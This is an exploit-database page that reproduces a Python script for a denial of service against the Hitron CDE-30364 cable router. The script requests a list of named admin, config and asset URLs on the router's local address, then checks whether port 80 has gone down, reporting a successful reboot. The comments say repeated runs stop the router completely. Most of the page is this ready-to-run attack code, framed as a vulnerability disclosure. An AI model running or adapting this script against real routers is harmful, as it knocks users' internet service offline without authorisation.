Hitron Technologies CDE-30364 Denial Of Service



EKU-ID: 4184 CVE: OSVDB-ID:
Author: Matias Mingorance Svensson Published: 2014-08-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python

#-----------------------------------------------------------------------------------------

#Description:
#-----------------------------------------------------------------------------------------

#Hitron Technologies CDE-30364 is a famous ONO Router.

#Scanning certain sensitive urls the router is restarted. If you run the
script several times, it stops working.

import httplib
import socket
import time

print
"\n###########################################################################################################"

print "# Exploit Title: Router ONO Hitron CDE-30364 - Remote
reboot                                              #"
print "# Date:
8-10-2013
#"
print "# Exploit Author: Matias Mingorance Svensson -
matias.ms[at]owasp.org
#"
print "# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
#"
print "# Tested on: Hitron Technologies
CDE-30364                                                                #"
print "# Version HW:
1A
#"
print "# Version SW:
3.1.0.8-ONO
#"
print
"###########################################################################################################\n"


host = '192.168.1.1'

#Sensitive urls
directories = ['login.asp', 'config.asp', 'reset.asp', 'css',
'css/webONO.css', 'css/ie7ONO.css', 'css/ie6ONO.css', 'js/',
'js/common.js', 'js/dict.js', 'js/hover.js', 'goform/login',
'goform/ConfigCable', 'admin/cable-Systeminfo.asp']

for directory in directories:
    conn = httplib.HTTPConnection(host)
    conn.request('GET', '/' + directory)
    r1 = conn.getresponse()
    print r1.status, r1.reason

    conn.close()

#Check 80 port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(4)
try:
 s.connect((host, 80))
 s.shutdown(2)
 print "\n"
 print "----------------------------------------------------------\n"
 print "Attack Fail!\n"
except:
 print "----------------------------------------------------------\n"
 print "Attack Successful! The router is rebooting!\n"
 print "Run the script several times to stop router completely!\n"

-- 
Un saludo,
Matías Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms